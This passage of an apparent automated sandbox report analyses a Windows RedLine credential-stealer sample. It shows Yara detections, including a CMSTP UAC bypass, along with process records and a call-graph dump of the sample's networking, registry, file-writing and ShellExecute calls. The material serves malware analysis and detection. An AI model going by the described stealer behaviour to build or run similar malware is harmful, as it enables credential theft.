                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2506109737.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:23:09:50
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:23:10:14
                                                                                                                                                                                                                            Start date:26/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Imagebase:0xfe0000
                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:5.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                              Signature Coverage:13.1%
                                                                                                                                                                                                                              Total number of Nodes:1111
                                                                                                                                                                                                                              Total number of Limit Nodes:17
                                                                                                                                                                                                                              execution_graph 38279 41aed0 38284 41ac9e 38279->38284 38281 41aef8 38285 41acc9 38284->38285 38292 41ae12 38285->38292 38299 422bb9 46 API calls 2 library calls 38285->38299 38287 41aebc 38303 410905 26 API calls _Deallocate 38287->38303 38289 41ae1b 38289->38281 38296 41a222 38289->38296 38291 41ae5c 38291->38292 38300 422bb9 46 API calls 2 library calls 38291->38300 38292->38289 38302 412381 20 API calls __dosmaperr 38292->38302 38294 41ae7b 38294->38292 38301 422bb9 46 API calls 2 library calls 38294->38301 38304 419bf7 38296->38304 38298 41a23d 38298->38281 38299->38291 38300->38294 38301->38292 38302->38287 38303->38289 38307 419c03 __FrameHandler3::FrameUnwindToState 38304->38307 38305 419c11 38322 412381 20 API calls __dosmaperr 38305->38322 38307->38305 38309 419c4a 38307->38309 38308 419c16 38323 410905 26 API calls _Deallocate 38308->38323 38315 41a1d1 38309->38315 38314 419c20 __wsopen_s 38314->38298 38325 4227a8 38315->38325 38318 419c6e 38324 419c97 LeaveCriticalSection __wsopen_s 38318->38324 38322->38308 38323->38314 38324->38314 38326 4227b4 38325->38326 38327 4227cb 38325->38327 38403 412381 20 API calls __dosmaperr 38326->38403 38329 4227d3 38327->38329 38330 4227ea 38327->38330 38405 412381 20 API calls __dosmaperr 38329->38405 38407 4172ce 10 API calls 2 library calls 38330->38407 38333 4227b9 38404 410905 26 API calls _Deallocate 38333->38404 38334 4227d8 38406 410905 26 API calls _Deallocate 38334->38406 38335 4227f1 MultiByteToWideChar 38338 422820 38335->38338 38339 422810 GetLastError 38335->38339 38409 417a45 38338->38409 38408 41234b 20 API calls __dosmaperr 38339->38408 38340 41a1e7 38340->38318 38349 41a242 38340->38349 38344 422850 38346 41629a _free 20 API calls 38344->38346 38345 42282f MultiByteToWideChar 38345->38344 38347 422844 GetLastError 38345->38347 38346->38340 38416 41234b 20 API calls __dosmaperr 38347->38416 38350 41a25f 38349->38350 38351 41a274 38350->38351 38352 41a28d 38350->38352 38433 41236e 20 API calls __dosmaperr 38351->38433 38419 41e6a7 38352->38419 38355 41a292 38356 41a2b2 38355->38356 38357 41a29b 38355->38357 38432 419f10 CreateFileW 38356->38432 38435 41236e 20 API calls __dosmaperr 38357->38435 38361 41a2a0 38436 412381 20 API calls __dosmaperr 38361->38436 38362 41a20f 38397 41629a 38362->38397 38364 41a368 GetFileType 38367 41a373 GetLastError 38364->38367 38368 41a3ba 38364->38368 38365 41a279 38434 412381 20 API calls __dosmaperr 38365->38434 38366 41a33d GetLastError 38438 41234b 20 API calls __dosmaperr 38366->38438 38439 41234b 20 API calls __dosmaperr 38367->38439 38441 41e5f0 21 API calls 2 library calls 38368->38441 38370 41a2eb 38370->38364 38370->38366 38437 419f10 CreateFileW 38370->38437 38372 41a381 CloseHandle 38372->38365 38374 41a3aa 38372->38374 38440 412381 20 API calls __dosmaperr 38374->38440 38376 41a330 38376->38364 38376->38366 38378 41a3db 38380 41a42e 38378->38380 38442 41a121 72 API calls 4 library calls 38378->38442 38379 41a3af 38379->38365 38443 419cc3 73 API calls 5 library calls 38380->38443 38383 41a44d 38385 41a465 38383->38385 38386 41a454 38383->38386 38384 41a427 38384->38380 38387 41a456 38384->38387 38389 41a544 38385->38389 38390 41a4e3 CloseHandle 38385->38390 38386->38387 38444 4163fd 38387->38444 38389->38362 38459 419f10 CreateFileW 38390->38459 38392 41a50e 38392->38389 38393 41a518 GetLastError 38392->38393 38460 41234b 20 API calls __dosmaperr 38393->38460 38395 41a524 38461 41e7b9 21 API calls 2 library calls 38395->38461 38398 4162ce __dosmaperr 38397->38398 38399 4162a5 RtlFreeHeap 38397->38399 38398->38318 38399->38398 38400 4162ba 38399->38400 38489 412381 20 API calls __dosmaperr 38400->38489 38402 4162c0 GetLastError 38402->38398 38403->38333 38404->38340 38405->38334 38406->38340 38407->38335 38408->38340 38410 417a83 38409->38410 38414 417a53 __FrameHandler3::FrameUnwindToState 38409->38414 38418 412381 20 API calls __dosmaperr 38410->38418 38412 417a6e RtlAllocateHeap 38413 417a81 38412->38413 38412->38414 38413->38344 38413->38345 38414->38410 38414->38412 38417 412ede 7 API calls 2 library calls 38414->38417 38416->38344 38417->38414 38418->38413 38420 41e6b3 __FrameHandler3::FrameUnwindToState 38419->38420 38462 4119fb EnterCriticalSection 38420->38462 38422 41e6ba 38424 41e6df 38422->38424 38427 41e74d EnterCriticalSection 38422->38427 38429 41e701 38422->38429 38466 41e486 21 API calls 2 library calls 38424->38466 38426 41e72a __wsopen_s 38426->38355 38427->38429 38430 41e75a LeaveCriticalSection 38427->38430 38428 41e6e4 38428->38429 38467 41e5cd EnterCriticalSection 38428->38467 38463 41e7b0 38429->38463 38430->38422 38432->38370 38433->38365 38434->38362 38435->38361 38436->38365 38437->38376 38438->38365 38439->38372 38440->38379 38441->38378 38442->38384 38443->38383 38469 41e84a 38444->38469 38446 416413 38482 41e7b9 21 API calls 2 library calls 38446->38482 38448 41640d 38448->38446 38449 416445 38448->38449 38452 41e84a __wsopen_s 26 API calls 38448->38452 38449->38446 38450 41e84a __wsopen_s 26 API calls 38449->38450 38454 416451 FindCloseChangeNotification 38450->38454 38451 41646b 38455 41648d 38451->38455 38483 41234b 20 API calls __dosmaperr 38451->38483 38453 41643c 38452->38453 38456 41e84a __wsopen_s 26 API calls 38453->38456 38454->38446 38457 41645d GetLastError 38454->38457 38455->38362 38456->38449 38457->38446 38459->38392 38460->38395 38461->38389 38462->38422 38468 411a43 LeaveCriticalSection 38463->38468 38465 41e7b7 38465->38426 38466->38428 38467->38429 38468->38465 38470 41e857 38469->38470 38471 41e86c 38469->38471 38484 41236e 20 API calls __dosmaperr 38470->38484 38476 41e891 38471->38476 38486 41236e 20 API calls __dosmaperr 38471->38486 38473 41e85c 38485 412381 20 API calls __dosmaperr 38473->38485 38476->38448 38477 41e89c 38487 412381 20 API calls __dosmaperr 38477->38487 38478 41e864 38478->38448 38480 41e8a4 38488 410905 26 API calls _Deallocate 38480->38488 38482->38451 38483->38455 38484->38473 38485->38478 38486->38477 38487->38480 38488->38478 38489->38402 38490 4017a2 38491 4017d0 38490->38491 38492 4017ab 38490->38492 38500 401b1e 38491->38500 38496 402c71 38492->38496 38494 4017cb 38497 402ca4 38496->38497 38499 402c80 BuildCatchObjectHelperInternal 38496->38499 38503 40373e 27 API calls 2 library calls 38497->38503 38499->38494 38504 402c50 38500->38504 38503->38499 38505 402c5a 38504->38505 38505->38505 38506 402c71 27 API calls 38505->38506 38507 401b3a 38506->38507 38507->38494 38508 408273 38509 40828f 38508->38509 38511 40831c std::_Xfsopen 29 API calls 38509->38511 38513 4082ce 38509->38513 38517 4082db 38509->38517 38511->38513 38516 4082d5 38513->38516 38518 40831c 38513->38518 38516->38517 38524 40e228 38516->38524 38537 411d27 38518->38537 38520 4082ee 38520->38517 38521 4106ef 38520->38521 38591 41049b 38521->38591 38523 410705 38523->38516 38525 40e234 __FrameHandler3::FrameUnwindToState 38524->38525 38526 40e245 38525->38526 38527 40e25a 38525->38527 38671 412381 20 API calls __dosmaperr 38526->38671 38529 40e255 _Xfiopen __wsopen_s 38527->38529 38654 40e81d EnterCriticalSection 38527->38654 38529->38517 38530 40e24a 38672 410905 26 API calls _Deallocate 38530->38672 38533 40e276 38655 40e1b2 38533->38655 38535 40e281 38673 40e29e LeaveCriticalSection std::_Xfsopen 38535->38673 38539 411c66 __FrameHandler3::FrameUnwindToState 38537->38539 38538 411c80 38562 412381 20 API calls __dosmaperr 38538->38562 38539->38538 38542 411cad 38539->38542 38541 411c85 38563 410905 26 API calls _Deallocate 38541->38563 38544 411cb2 38542->38544 38545 411cbf 38542->38545 38564 412381 20 API calls __dosmaperr 38544->38564 38554 416499 38545->38554 38548 411cc8 38549 411cdc std::_Xfsopen 38548->38549 38550 411ccf 38548->38550 38566 411d10 LeaveCriticalSection std::_Xfsopen _Xfiopen 38549->38566 38565 412381 20 API calls __dosmaperr 38550->38565 38551 411c90 __wsopen_s 38551->38520 38555 4164a5 __FrameHandler3::FrameUnwindToState 38554->38555 38567 4119fb EnterCriticalSection 38555->38567 38557 4164b3 38568 416533 38557->38568 38561 4164e4 __wsopen_s 38561->38548 38562->38541 38563->38551 38564->38551 38565->38551 38566->38551 38567->38557 38571 416556 38568->38571 38569 4165af 38587 41704e 20 API calls 3 library calls 38569->38587 38571->38569 38577 4164c0 38571->38577 38585 40e81d EnterCriticalSection 38571->38585 38586 40e831 LeaveCriticalSection 38571->38586 38572 4165b8 38574 41629a _free 20 API calls 38572->38574 38575 4165c1 38574->38575 38575->38577 38588 4175b5 11 API calls 2 library calls 38575->38588 38582 4164ef 38577->38582 38578 4165e0 38589 40e81d EnterCriticalSection 38578->38589 38581 4165f3 38581->38577 38590 411a43 LeaveCriticalSection 38582->38590 38584 4164f6 38584->38561 38585->38571 38586->38571 38587->38572 38588->38578 38589->38581 38590->38584 38592 4104a7 __FrameHandler3::FrameUnwindToState 38591->38592 38593 4104b3 38592->38593 38595 4104d9 38592->38595 38616 412381 20 API calls __dosmaperr 38593->38616 38604 40e81d EnterCriticalSection 38595->38604 38596 4104b8 38617 410905 26 API calls _Deallocate 38596->38617 38599 4104e5 38605 4105fb 38599->38605 38601 4104f9 38618 410518 LeaveCriticalSection std::_Xfsopen 38601->38618 38603 4104c3 __wsopen_s 38603->38523 38604->38599 38606 41061d 38605->38606 38607 41060d 38605->38607 38619 410522 38606->38619 38632 412381 20 API calls __dosmaperr 38607->38632 38610 410612 38610->38601 38611 410640 _Xfiopen 38615 4106bf 38611->38615 38623 40dfcb 38611->38623 38615->38601 38616->38596 38617->38603 38618->38603 38620 410535 38619->38620 38622 41052e _Xfiopen 38619->38622 38621 419800 _Xfiopen 28 API calls 38620->38621 38620->38622 38621->38622 38622->38611 38624 40dfe3 38623->38624 38628 40dfdf 38623->38628 38624->38628 38633 4154e8 38624->38633 38626 40e003 38640 415fa3 62 API calls 4 library calls 38626->38640 38629 419800 38628->38629 38643 419767 38629->38643 38632->38610 38634 4154f4 38633->38634 38635 415509 38633->38635 38641 412381 20 API calls __dosmaperr 38634->38641 38635->38626 38637 4154f9 38642 410905 26 API calls _Deallocate 38637->38642 38639 415504 38639->38626 38640->38628 38641->38637 38642->38639 38644 41e84a __wsopen_s 26 API calls 38643->38644 38645 419779 38644->38645 38646 419781 38645->38646 38647 419792 SetFilePointerEx 38645->38647 38652 412381 20 API calls __dosmaperr 38646->38652 38649 419786 38647->38649 38650 4197aa GetLastError 38647->38650 38649->38615 38653 41234b 20 API calls __dosmaperr 38650->38653 38652->38649 38653->38649 38654->38533 38656 40e1d4 38655->38656 38657 40e1bf 38655->38657 38659 40dfcb _Xfiopen 62 API calls 38656->38659 38661 40e1cf _Xfiopen 38656->38661 38693 412381 20 API calls __dosmaperr 38657->38693 38662 40e1e8 38659->38662 38660 40e1c4 38694 410905 26 API calls _Deallocate 38660->38694 38661->38535 38674 4165f6 38662->38674 38666 4154e8 _Xfiopen 26 API calls 38667 40e1f6 38666->38667 38678 41637e 38667->38678 38670 41629a _free 20 API calls 38670->38661 38671->38530 38672->38529 38673->38529 38675 41660c 38674->38675 38677 40e1f0 38674->38677 38676 41629a _free 20 API calls 38675->38676 38675->38677 38676->38677 38677->38666 38679 4163a2 38678->38679 38680 41638d 38678->38680 38681 4163dd 38679->38681 38685 4163c9 38679->38685 38698 41236e 20 API calls __dosmaperr 38680->38698 38700 41236e 20 API calls __dosmaperr 38681->38700 38684 416392 38699 412381 20 API calls __dosmaperr 38684->38699 38695 416356 38685->38695 38686 4163e2 38701 412381 20 API calls __dosmaperr 38686->38701 38690 40e1fc 38690->38661 38690->38670 38691 4163ea 38702 410905 26 API calls _Deallocate 38691->38702 38693->38660 38694->38661 38703 4162d4 38695->38703 38697 41637a 38697->38690 38698->38684 38699->38690 38700->38686 38701->38691 38702->38690 38704 4162e0 __FrameHandler3::FrameUnwindToState 38703->38704 38714 41e5cd EnterCriticalSection 38704->38714 38706 4162ee 38707 416320 38706->38707 38708 416315 38706->38708 38715 412381 20 API calls __dosmaperr 38707->38715 38709 4163fd __wsopen_s 29 API calls 38708->38709 38711 41631b 38709->38711 38716 41634a LeaveCriticalSection __wsopen_s 38711->38716 38713 41633d __wsopen_s 38713->38697 38714->38706 38715->38711 38716->38713 38717 416ec2 38718 416ecf 38717->38718 38721 416ee7 38717->38721 38767 412381 20 API calls __dosmaperr 38718->38767 38720 416ed4 38768 410905 26 API calls _Deallocate 38720->38768 38723 416f42 38721->38723 38731 416edf 38721->38731 38769 418c55 21 API calls 2 library calls 38721->38769 38725 4154e8 _Xfiopen 26 API calls 38723->38725 38726 416f5a 38725->38726 38737 41919a 38726->38737 38728 416f61 38729 4154e8 _Xfiopen 26 API calls 38728->38729 38728->38731 38730 416f8d 38729->38730 38730->38731 38732 4154e8 _Xfiopen 26 API calls 38730->38732 38733 416f9b 38732->38733 38733->38731 38734 4154e8 _Xfiopen 26 API calls 38733->38734 38735 416fab 38734->38735 38736 4154e8 _Xfiopen 26 API calls 38735->38736 38736->38731 38738 4191a6 __FrameHandler3::FrameUnwindToState 38737->38738 38739 4191c6 38738->38739 38740 4191ae 38738->38740 38741 41928c 38739->38741 38745 4191ff 38739->38745 38836 41236e 20 API calls __dosmaperr 38740->38836 38843 41236e 20 API calls __dosmaperr 38741->38843 38744 4191b3 38837 412381 20 API calls __dosmaperr 38744->38837 38748 419223 38745->38748 38749 41920e 38745->38749 38746 419291 38844 412381 20 API calls __dosmaperr 38746->38844 38770 41e5cd EnterCriticalSection 38748->38770 38838 41236e 20 API calls __dosmaperr 38749->38838 38753 41921b 38845 410905 26 API calls _Deallocate 38753->38845 38754 419213 38839 412381 20 API calls __dosmaperr 38754->38839 38755 419229 38758 419245 38755->38758 38759 41925a 38755->38759 38756 4191bb __wsopen_s 38756->38728 38840 412381 20 API calls __dosmaperr 38758->38840 38771 4192ad 38759->38771 38763 419255 38842 419284 LeaveCriticalSection __wsopen_s 38763->38842 38764 41924a 38841 41236e 20 API calls __dosmaperr 38764->38841 38767->38720 38768->38731 38769->38723 38770->38755 38772 4192d7 38771->38772 38773 4192bf 38771->38773 38775 419641 38772->38775 38780 41931c 38772->38780 38855 41236e 20 API calls __dosmaperr 38773->38855 38869 41236e 20 API calls __dosmaperr 38775->38869 38776 4192c4 38856 412381 20 API calls __dosmaperr 38776->38856 38779 419646 38870 412381 20 API calls __dosmaperr 38779->38870 38782 419327 38780->38782 38783 4192cc 38780->38783 38787 419357 38780->38787 38857 41236e 20 API calls __dosmaperr 38782->38857 38783->38763 38784 419334 38871 410905 26 API calls _Deallocate 38784->38871 38786 41932c 38858 412381 20 API calls __dosmaperr 38786->38858 38790 419370 38787->38790 38791 4193b2 38787->38791 38792 419396 38787->38792 38790->38792 38796 41937d 38790->38796 38794 417a45 std::_Locinfo::_Locinfo_ctor 21 API calls 38791->38794 38859 41236e 20 API calls __dosmaperr 38792->38859 38797 4193c9 38794->38797 38795 41939b 38860 412381 20 API calls __dosmaperr 38795->38860 38846 4210f9 38796->38846 38800 41629a _free 20 API calls 38797->38800 38803 4193d2 38800->38803 38801 41951b 38804 419591 38801->38804 38808 419534 GetConsoleMode 38801->38808 38802 4193a2 38861 410905 26 API calls _Deallocate 38802->38861 38806 41629a _free 20 API calls 38803->38806 38807 419595 ReadFile 38804->38807 38809 4193d9 38806->38809 38810 419609 GetLastError 38807->38810 38811 4195af 38807->38811 38808->38804 38812 419545 38808->38812 38814 4193e3 38809->38814 38815 4193fe 38809->38815 38816 419616 38810->38816 38817 41956d 38810->38817 38811->38810 38818 419586 38811->38818 38812->38807 38813 41954b ReadConsoleW 38812->38813 38813->38818 38819 419567 GetLastError 38813->38819 38862 412381 20 API calls __dosmaperr 38814->38862 38823 419800 _Xfiopen 28 API calls 38815->38823 38867 412381 20 API calls __dosmaperr 38816->38867 38833 4193ad __fread_nolock 38817->38833 38864 41234b 20 API calls __dosmaperr 38817->38864 38827 4195d4 38818->38827 38828 4195eb 38818->38828 38818->38833 38819->38817 38820 41629a _free 20 API calls 38820->38783 38823->38796 38825 4193e8 38863 41236e 20 API calls __dosmaperr 38825->38863 38826 41961b 38868 41236e 20 API calls __dosmaperr 38826->38868 38865 418fc9 31 API calls 3 library calls 38827->38865 38832 419602 38828->38832 38828->38833 38866 418e09 29 API calls _Xfiopen 38832->38866 38833->38820 38835 419607 38835->38833 38836->38744 38837->38756 38838->38754 38839->38753 38840->38764 38841->38763 38842->38756 38843->38746 38844->38753 38845->38756 38847 421113 38846->38847 38848 421106 38846->38848 38850 42111f 38847->38850 38873 412381 20 API calls __dosmaperr 38847->38873 38872 412381 20 API calls __dosmaperr 38848->38872 38850->38801 38852 42110b 38852->38801 38853 421140 38874 410905 26 API calls _Deallocate 38853->38874 38855->38776 38856->38783 38857->38786 38858->38784 38859->38795 38860->38802 38861->38833 38862->38825 38863->38833 38864->38833 38865->38833 38866->38835 38867->38826 38868->38833 38869->38779 38870->38784 38871->38783 38872->38852 38873->38853 38874->38852 38875 409385 38876 409391 __FrameHandler3::FrameUnwindToState 38875->38876 38907 40959e 38876->38907 38878 409398 38879 4094eb 38878->38879 38882 4093c2 38878->38882 39013 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 38879->39013 38881 4094f2 39004 413b51 38881->39004 38895 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 38882->38895 39007 413876 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38882->39007 38887 4093db 38889 4093e1 38887->38889 39008 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38887->39008 38891 409462 38918 409b8d 38891->38918 38895->38891 39009 40e677 39 API calls 5 library calls 38895->39009 38908 4095a7 38907->38908 39015 409d1b IsProcessorFeaturePresent 38908->39015 38910 4095b3 39016 40c90d 10 API calls 3 library calls 38910->39016 38912 4095b8 38913 4095bc 38912->38913 39017 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38912->39017 38913->38878 38915 4095c5 38916 4095d3 38915->38916 39018 40c936 8 API calls 3 library calls 38915->39018 38916->38878 39019 40b740 38918->39019 38921 409468 38922 4137c7 38921->38922 39021 41e091 38922->39021 38924 4137d0 38926 409471 38924->38926 39025 41e39b 38 API calls 38924->39025 38927 424a0e 38926->38927 38928 424a1e _Xfiopen 38927->38928 38929 401b1e 27 API calls 38928->38929 38930 424a4c 38929->38930 39027 403498 38930->39027 38935 401b1e 27 API calls 38936 424aac 38935->38936 39034 4265bc 38936->39034 38939 401b1e 27 API calls 38940 424ac5 GetModuleFileNameA 38939->38940 38941 401b1e 27 API calls 38940->38941 38942 424aee 38941->38942 39054 42604a 38942->39054 38944 424afe 38945 4252ab 38944->38945 38946 401b1e 27 API calls 38944->38946 38947 401b1e 27 API calls 38945->38947 38950 424f72 38946->38950 38948 425482 38947->38948 39158 40356f 38948->39158 39073 4034e3 38950->39073 38952 42549f 38953 42676c 63 API calls 38952->38953 38960 425526 38953->38960 38954 424f9c 39081 42676c 38954->39081 38956 4250db 39144 42615a 38956->39144 38961 42676c 63 API calls 38960->38961 38966 42588a ___scrt_fastfail 38961->38966 38962 425fc0 39194 4019f8 26 API calls 38962->39194 38966->38962 39166 426582 38966->39166 38968 4258f8 39169 426242 CreateFileA 38968->39169 38972 401b1e 27 API calls 38973 425924 38972->38973 39172 426510 38973->39172 38975 425929 38976 42676c 63 API calls 38975->38976 38979 425b35 ___scrt_fastfail 38976->38979 38977 425fb4 39193 4019f8 26 API calls 38977->39193 38980 426582 51 API calls 38979->38980 38992 425cfd 38979->38992 38981 425ba4 ___scrt_fastfail 38980->38981 38982 426582 51 API calls 38981->38982 38983 425bc7 ___scrt_fastfail 38982->38983 38983->38983 38984 426242 3 API calls 38983->38984 38985 425cbb 38984->38985 38986 425cc0 CreateDirectoryA 38985->38986 38985->38992 39179 42628b 38986->39179 38988 425ce2 38989 401b1e 27 API calls 38988->38989 38988->38992 38990 425cf8 38989->38990 38991 426510 29 API calls 38990->38991 38991->38992 38992->38977 38993 42676c 63 API calls 38992->38993 38995 425eff ___scrt_fastfail 38993->38995 38996 426582 51 API calls 38995->38996 39000 425f9b 38995->39000 38997 425f6d 38996->38997 38998 426242 3 API calls 38997->38998 38999 425f7f 38998->38999 38999->39000 39001 401b1e 27 API calls 38999->39001 39192 4019f8 26 API calls 39000->39192 39002 425f96 39001->39002 39003 426510 29 API calls 39002->39003 39003->39000 39645 4138ce 39004->39645 39007->38887 39008->38895 39009->38891 39013->38881 39015->38910 39016->38912 39017->38915 39018->38913 39020 409ba0 GetStartupInfoW 39019->39020 39020->38921 39022 41e09a 39021->39022 39023 41e0a3 39021->39023 39026 41df90 51 API calls 5 library calls 39022->39026 39023->38924 39025->38924 39026->39023 39028 4034c0 39027->39028 39029 4034d9 39027->39029 39028->39029 39195 40e509 46 API calls 39028->39195 39031 401b52 39029->39031 39196 402d13 39031->39196 39033 401b68 39033->38935 39035 4265c6 __EH_prolog 39034->39035 39227 403e0c 39035->39227 39037 4265ea 39037->39037 39038 402c71 27 API calls 39037->39038 39039 42664f 39038->39039 39241 404097 39039->39241 39042 4266fe 39043 42671a std::ios_base::_Ios_base_dtor 39042->39043 39258 40387f 26 API calls _Deallocate 39042->39258 39254 402bef 39043->39254 39045 4266d6 39048 402c50 27 API calls 39045->39048 39046 402c71 27 API calls 39046->39045 39050 4266f6 39048->39050 39052 402bef 26 API calls 39050->39052 39051 402bef 26 API calls 39053 424ab8 39051->39053 39052->39042 39053->38939 39055 426054 __EH_prolog 39054->39055 39388 401bb2 39055->39388 39060 4260b3 39404 401a16 39060->39404 39061 426097 39425 401b6f 39061->39425 39064 4260c0 39407 4024a1 39064->39407 39068 4260aa std::ios_base::_Ios_base_dtor 39068->38944 39071 42610e 39072 401b6f 68 API calls 39071->39072 39072->39068 39074 4034ed __EH_prolog 39073->39074 39576 401056 39074->39576 39076 403513 39077 401056 50 API calls 39076->39077 39078 403542 39077->39078 39580 40399f 39078->39580 39080 403553 39080->38954 39082 426776 __EH_prolog 39081->39082 39083 401b1e 27 API calls 39082->39083 39084 426b3f 39083->39084 39618 401aa1 39084->39618 39086 426b55 39087 401aa1 27 API calls 39086->39087 39088 426bdc 39087->39088 39089 401aa1 27 API calls 39088->39089 39090 426be9 39089->39090 39091 401aa1 27 API calls 39090->39091 39092 426c4c 39091->39092 39093 401aa1 27 API calls 39092->39093 39094 426c5d 39093->39094 39095 401aa1 27 API calls 39094->39095 39096 426c6a 39095->39096 39097 401aa1 27 API calls 39096->39097 39098 426d15 39097->39098 39099 401aa1 27 API calls 39098->39099 39100 42700c 39099->39100 39101 401aa1 27 API calls 39100->39101 39102 4272bb 39101->39102 39103 401aa1 27 API calls 39102->39103 39129 4272c8 39103->39129 39104 4273e4 39105 401aa1 27 API calls 39104->39105 39106 4273f1 WSAStartup 39105->39106 39107 42740b socket 39106->39107 39130 427642 39106->39130 39108 427423 39107->39108 39109 427438 39107->39109 39110 42742c WSACleanup 39108->39110 39111 427440 gethostbyname 39109->39111 39113 4277f3 39110->39113 39114 427451 _Yarn 39111->39114 39111->39130 39112 4277e6 WSACleanup closesocket 39112->39113 39113->38956 39115 427464 htons connect 39114->39115 39116 427493 39115->39116 39115->39130 39117 4274a5 send 39116->39117 39118 4274b5 39117->39118 39117->39130 39119 4274bb send 39118->39119 39125 4274d1 ___scrt_fastfail 39118->39125 39119->39125 39119->39130 39120 4274f7 recv 39120->39125 39120->39130 39121 412faf 46 API calls 39121->39125 39122 427635 39123 42763c 39122->39123 39124 42777d 39122->39124 39142 427651 39122->39142 39123->39130 39123->39142 39126 42779d recv 39124->39126 39124->39130 39125->39120 39125->39121 39125->39122 39125->39130 39624 411957 42 API calls 39125->39624 39126->39124 39126->39130 39127 427675 recv 39127->39130 39127->39142 39129->39104 39132 401aa1 27 API calls 39129->39132 39130->39112 39131 427770 39131->39130 39133 4273b4 39132->39133 39622 403ae1 27 API calls 39133->39622 39136 4273bf 39623 401ac2 27 API calls 39136->39623 39138 4273cc 39141 401aa1 27 API calls 39138->39141 39140 427712 recv 39140->39130 39140->39142 39141->39104 39142->39127 39142->39130 39142->39131 39142->39140 39143 42773d recv 39142->39143 39625 411957 42 API calls 39142->39625 39626 426148 22 API calls 39142->39626 39143->39130 39143->39142 39632 42780c 39144->39632 39146 426164 RegCreateKeyExA 39147 426222 39146->39147 39148 426197 39146->39148 39149 42529e 39147->39149 39150 426228 RegCloseKey 39147->39150 39151 402c71 27 API calls 39148->39151 39191 4019f8 26 API calls 39149->39191 39150->39149 39152 4261c0 39151->39152 39153 402c71 27 API calls 39152->39153 39154 4261e9 RegSetValueExA 39153->39154 39155 402bef 26 API calls 39154->39155 39156 42621a 39155->39156 39157 402bef 26 API calls 39156->39157 39157->39147 39159 403579 __EH_prolog 39158->39159 39160 401056 50 API calls 39159->39160 39161 40359c 39160->39161 39162 401056 50 API calls 39161->39162 39163 4035c8 39162->39163 39164 40399f 27 API calls 39163->39164 39165 4035d9 39164->39165 39165->38952 39633 410c7b 39166->39633 39168 426594 39168->38968 39168->39168 39170 42590d 39169->39170 39171 426269 WriteFile FindCloseChangeNotification 39169->39171 39170->38972 39170->38975 39171->39170 39173 426521 39172->39173 39173->39173 39174 426529 ShellExecuteExA 39173->39174 39175 426575 39174->39175 39176 42655e WaitForSingleObject CloseHandle 39174->39176 39177 402bef 26 API calls 39175->39177 39176->39175 39178 42657d 39177->39178 39178->38975 39644 427830 39179->39644 39181 426297 CoInitialize CoCreateInstance 39182 4262ef MultiByteToWideChar SysAllocStringLen 39181->39182 39190 4262d1 __except_handler3 39181->39190 39184 426324 39182->39184 39184->39184 39185 42632b MultiByteToWideChar 39184->39185 39186 42633f 39185->39186 39186->39186 39187 426346 MultiByteToWideChar SysAllocStringLen 39186->39187 39188 426368 39187->39188 39188->39188 39189 42636f MultiByteToWideChar 39188->39189 39189->39190 39190->38988 39195->39028 39197 402d2a 39196->39197 39199 402d31 _Yarn 39197->39199 39200 403859 39197->39200 39199->39033 39201 403866 39200->39201 39202 40386f 39200->39202 39207 4039ce 39201->39207 39204 40387b 39202->39204 39216 409256 39202->39216 39204->39199 39206 40386c 39206->39199 39208 409256 std::_Facet_Register 8 API calls 39207->39208 39209 4039e5 39208->39209 39210 4039f7 39209->39210 39211 4039ec 39209->39211 39223 41088a 26 API calls 3 library calls 39210->39223 39211->39206 39213 410924 39224 410932 11 API calls _abort 39213->39224 39215 410931 39217 40925b ___crtLCMapStringA 39216->39217 39218 